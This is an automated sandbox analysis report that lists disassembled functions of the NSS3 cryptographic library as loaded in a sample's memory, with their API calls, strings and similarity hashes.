Part of subcall function 6CADF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CADF122

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,?), ref: 6CAC8E5B

Part of subcall function 6CADBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CA8E708,00000000,00000000,00000004,00000000), ref: 6CADBE6A
Part of subcall function 6CADBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA904DC,?), ref: 6CADBE7E
Part of subcall function 6CADBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CADBEC2

SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CBAD8C4), ref: 6CAC8E94
SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000000,?), ref: 6CAC8EAC
PORT_ZAlloc_Util.NSS3(00000018), ref: 6CAC8EBA
SECOID_CopyAlgorithmID_Util.NSS3(00000000,00000000,00000000), ref: 6CAC8ECC
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6CAC8EE1
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CAC8EF4
free.MOZGLUE(00000000), ref: 6CAC8EFD
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAC8F11
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CAC8F1C

Strings

tFVPj, xrefs: 6CAC8EC4

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena_Item_$Free$AlgorithmAlloc_ArenaCopyEncodeFindTag_$ErrorZfree$Integer_$GenerateHashInitK11_LockPoolRandomResultTypecallocfree
String ID: tFVPj
API String ID: 2709086113-199373283
Opcode ID: 5c4b68e3f7a4876f2d23579ff0c9688f418edc242e532d1436644415e48e0dd2
Instruction ID: 6618632716da8f479f0ad96d95fa5abade7fd4f4c5313ef26961b0309984d39a
Opcode Fuzzy Hash: 5c4b68e3f7a4876f2d23579ff0c9688f418edc242e532d1436644415e48e0dd2
Instruction Fuzzy Hash: 12D1E3B1B093049BE7008F24DD80BAB76E8FF55348F19492AEC54C6A91F734D9D887A3

Function 6CAEAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAEACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CAEACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CAEACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CAEAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CAEADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAEADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAEADF0

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAEB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAEB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAEB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAEB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CAEB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAEB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAEB40C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 2e326e7b6f0ad86227b3b353212f7db4295d13805d2b6063ae27a4d8dee5cab1
Instruction ID: b5df468121715b1ecb5d0c23a30af776423f61f13ba51d2e483b1d6ad58c0e75
Opcode Fuzzy Hash: 2e326e7b6f0ad86227b3b353212f7db4295d13805d2b6063ae27a4d8dee5cab1
Instruction Fuzzy Hash: 8D22C171904301AFE700CF14DD48B9A77E1AF8830CF18866CE8595B792E772E899DBD6

Function 6CA6ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CA6ED38

Part of subcall function 6CA04F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA04FC4

sqlite3_mprintf.NSS3(snippet), ref: 6CA6EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6CA6EFE4

Part of subcall function 6CB2DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA05001,?,00000003,00000000), ref: 6CB2DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6CA6F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6CA6F129
sqlite3_mprintf.NSS3(optimize), ref: 6CA6F1D1
sqlite3_free.NSS3(?), ref: 6CA6F368

Strings

fts3, xrefs: 6CA6F247
fts4aux, xrefs: 6CA6ECF9
porter, xrefs: 6CA6ED97
matchinfo, xrefs: 6CA6F04F, 6CA6F082, 6CA6F0C2, 6CA6F0F2, 6CA6F124, 6CA6F169
simple, xrefs: 6CA6ED79
fts3tokenize, xrefs: 6CA6F30F
optimize, xrefs: 6CA6F199, 6CA6F1CC, 6CA6F211
snippet, xrefs: 6CA6EF05, 6CA6EF37, 6CA6EF7C
fts4, xrefs: 6CA6F2AD
unicode61, xrefs: 6CA6EDB5
fts3_tokenizer, xrefs: 6CA6EE1A, 6CA6EEA8
offsets, xrefs: 6CA6EFAF, 6CA6EFDF, 6CA6F01F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 3d6ce451d499c25b66a9b08a952a8329dce8001475cd492266cef60a7fd0cb54
Instruction ID: 240bd788c95c42386f348977dc61386b525b024956e0c5ea490e57122706d94f
Opcode Fuzzy Hash: 3d6ce451d499c25b66a9b08a952a8329dce8001475cd492266cef60a7fd0cb54
Instruction Fuzzy Hash: A002E3B5B043404BD7049E729C9573B76B6ABC570CF18493CD85A97F01EB74E98ACB82

Function 6CAAA4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6CA828AD,pkcs11:,00000007), ref: 6CAAA501
PORT_Strdup_Util.NSS3(6CA828AD), ref: 6CAAA514

Part of subcall function 6CAE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA82AF5,?,?,?,?,?,6CA80A1B,00000000), ref: 6CAE0F1A
Part of subcall function 6CAE0F10: malloc.MOZGLUE(00000001), ref: 6CAE0F30
Part of subcall function 6CAE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAE0F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6CAAA529
PK11_GetInternalKeySlot.NSS3 ref: 6CAAA60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6CAAA74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6CAAA777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAAA80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6CAAA82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6CAAA952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAAA9C3

Part of subcall function 6CAD0960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6CAAA8F5,00000000,?,00000010), ref: 6CAD097E
Part of subcall function 6CAD0960: memcmp.VCRUNTIME140(?,00000000,6CAAA8F5,00000010), ref: 6CAD098D

free.MOZGLUE(00000000), ref: 6CAAAB18
strchr.VCRUNTIME140(?,00000040), ref: 6CAAAB40
free.MOZGLUE(?), ref: 6CAAABE1

Part of subcall function 6CAA4170: TlsGetValue.KERNEL32(?,6CA828AD,00000000,?,6CAAA793,?,00000000), ref: 6CAA419F
Part of subcall function 6CAA4170: EnterCriticalSection.KERNEL32(0000001C), ref: 6CAA41AF
Part of subcall function 6CAA4170: PR_Unlock.NSS3(?), ref: 6CAA41D4

Strings

pkcs11:, xrefs: 6CAAA4FB
model, xrefs: 6CAAA8CF
object, xrefs: 6CAAA5CF
token, xrefs: 6CAAA875
manufacturer, xrefs: 6CAAA8A2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: 749250d12ee96f18de13c81937386f8fdbe49c71a387ed001c2e137074d5f160
Instruction ID: eaff3d6cb86f01b1350747b99f476418bebe3c77b242a8d6707926e170c950ea
Opcode Fuzzy Hash: 749250d12ee96f18de13c81937386f8fdbe49c71a387ed001c2e137074d5f160
Instruction Fuzzy Hash: 670286B5D00214AFEF219B709D41BAE76B6AF05208F1440A4E90DA7712FB319EDDCF92

Function 6CABEA00 Relevance: 28.8, APIs: 19, Instructions: 304COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6CAC8C9F,00000000,00000000,?), ref: 6CABEA29

Part of subcall function 6CAE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE08B4

SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,000000A0,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6CAC8C9F), ref: 6CABEB01
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6CBAC6C4), ref: 6CABEB28
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CABEBC6
SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CABEBDE
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CABEBEB
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000010,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6CAC8C9F), ref: 6CABEC17
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CABEC2F
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CABEC4B
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6CBAC754), ref: 6CABEC6D
free.MOZGLUE(?), ref: 6CABEC7F
free.MOZGLUE(00000000), ref: 6CABEC90
free.MOZGLUE(?), ref: 6CABECA1
free.MOZGLUE(00000000), ref: 6CABECBF
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CABECD4
SECOID_CopyAlgorithmID_Util.NSS3(?,?,00000000), ref: 6CAC91D5
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6CAC91E8
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CAC91F2
free.MOZGLUE(00000000), ref: 6CAC91FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Encode$Item_free$Integer_Unsigned$Zfree$Algorithm$CopyErrorFindTag_
String ID:
API String ID: 899953378-0
Opcode ID: 5eb76ebb8a4426aa59612ad025a9b23c3a283edc26bc49efdf21d32db91cad8b
Instruction ID: 64d67eb7bf73b5229b43bd9c6b50aa84d22cac049f6b65e238124df4969956b8
Opcode Fuzzy Hash: 5eb76ebb8a4426aa59612ad025a9b23c3a283edc26bc49efdf21d32db91cad8b
Instruction Fuzzy Hash: 9BA1F575A002055BEB00CA69DD80BAF77ACEB45348F288479E816E7BC1E635E994C7D2

Function 6CAB0BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6CAB0BFA

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB0C18
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6CAB0C2E
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6CAB0C39
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAB0C45
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CAB0CC1
PORT_Alloc_Util.NSS3(?), ref: 6CAB0CDA
memcpy.VCRUNTIME140(?,?,?), ref: 6CAB0D1B
PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6CAB0D79
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAB0DB2
PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6CAB0DE4
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAB0DFE
PR_SetError.NSS3(FFFFE064,00000000), ref: 6CAB0E2C
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6CAB0E38
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAB0E44
free.MOZGLUE(?), ref: 6CAB0E7E
free.MOZGLUE(?), ref: 6CAB0EAE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
String ID:
API String ID: 2510822978-0
Opcode ID: 9e42b6479ffa2ccab33d6edd5c2fc7aab32ac60e0dd30223c091b9590804876f
Instruction ID: 4d5b22100fe919abf74527b164fab3e1e5f8b69ddc80ad8204e622854cc1ecfc
Opcode Fuzzy Hash: 9e42b6479ffa2ccab33d6edd5c2fc7aab32ac60e0dd30223c091b9590804876f
Instruction Fuzzy Hash: D791B3F19043809FD7109F68DE4575BBBE8AF85308F14852CF899A7751EB31E988CB92

Function 6CA7EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA7EF63

Part of subcall function 6CA887D0: PORT_NewArena_Util.NSS3(00000800,6CA7EF74,00000000), ref: 6CA887E8
Part of subcall function 6CA887D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6CA7EF74,00000000), ref: 6CA887FD
Part of subcall function 6CA887D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA8884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6CA7F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA7F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6CA7F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6CA7F374
PL_strcasecmp.NSS3(6CBC2FD4,?), ref: 6CA7F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6CA7F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CA7F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA7F67D
CERT_DestroyName.NSS3(?), ref: 6CA7F68B

Part of subcall function 6CA88320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6CA88338
Part of subcall function 6CA88320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CA88364
Part of subcall function 6CA88320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6CA8838E
Part of subcall function 6CA88320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA883A5
Part of subcall function 6CA88320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA883E3

Part of subcall function 6CA884C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6CA884D9
Part of subcall function 6CA884C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA88528

Part of subcall function 6CA88900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6CA7F599,?,00000000), ref: 6CA88955

Strings

", xrefs: 6CA7F21B
oid., xrefs: 6CA7F2CF
*, xrefs: 6CA7F3C6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: d19df10f47e4b0d270b70836b79bd2c547b9630a86a2527183329cb023ce0469
Instruction ID: 84fae2601474b9a6a52807b97b0dfa329acdb49a498bc0268fd94e19121f38e9
Opcode Fuzzy Hash: d19df10f47e4b0d270b70836b79bd2c547b9630a86a2527183329cb023ce0469
Instruction Fuzzy Hash: F2223B7960C3408FD720CE29CC907AAB7E6BB85318F18462DE5D587B91E7319E85C7A3

Function 6CAEEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CAEDAE2,?), ref: 6CAEC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAEF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAEF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CAEF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAEF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CBB218C), ref: 6CAEF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CAEF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAEF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CAEF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CAEF210

Part of subcall function 6CA952D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CAEF1E9,?,00000000,?,?), ref: 6CA952F5
Part of subcall function 6CA952D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CA9530F
Part of subcall function 6CA952D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CA95326
Part of subcall function 6CA952D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CAEF1E9,?,00000000,?,?), ref: 6CA95340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAEF227

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CAEF23E

Part of subcall function 6CADBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CA8E708,00000000,00000000,00000004,00000000), ref: 6CADBE6A
Part of subcall function 6CADBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA904DC,?), ref: 6CADBE7E
Part of subcall function 6CADBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CADBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAEF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAEF3A8

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CAEF3B3

Part of subcall function 6CA92D20: PK11_DestroyObject.NSS3(?,?), ref: 6CA92D3C
Part of subcall function 6CA92D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA92D5F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 243bd694c76045da996834b533c3393be6821160cd04201a9895786b72fb8ff5
Instruction ID: 2a1f56cb05cd8b45ce705882c51a20117fa090a33be578e2ab7d0e4a73d6b829
Opcode Fuzzy Hash: 243bd694c76045da996834b533c3393be6821160cd04201a9895786b72fb8ff5
Instruction Fuzzy Hash: B8D17EB6E012059BDB10CFA9ED80A9EB7F5EF4C308F19812DD915A7711EB31E885DB90

Function 6CACA9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CACA9CA

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6CBE0B04,?), ref: 6CACA9F7

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CACAA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CACAA33
PK11_GetInternalKeySlot.NSS3 ref: 6CACAA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6CACAA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6CACAAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6CACAB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CACAB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6CACAB85
PK11_FreeSymKey.NSS3(00000000), ref: 6CACAB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CACABDC
PK11_FreeSymKey.NSS3(?), ref: 6CACABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CACABF7

Part of subcall function 6CACAC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CACAB3E,?,?,?), ref: 6CACAC35
Part of subcall function 6CACAC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CACAB3E,?,?,?), ref: 6CACAC55
Part of subcall function 6CACAC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CACAB3E,?,?), ref: 6CACAC70
Part of subcall function 6CACAC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CACAC92
Part of subcall function 6CACAC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CACAB3E), ref: 6CACACD7

Memory Dump Source

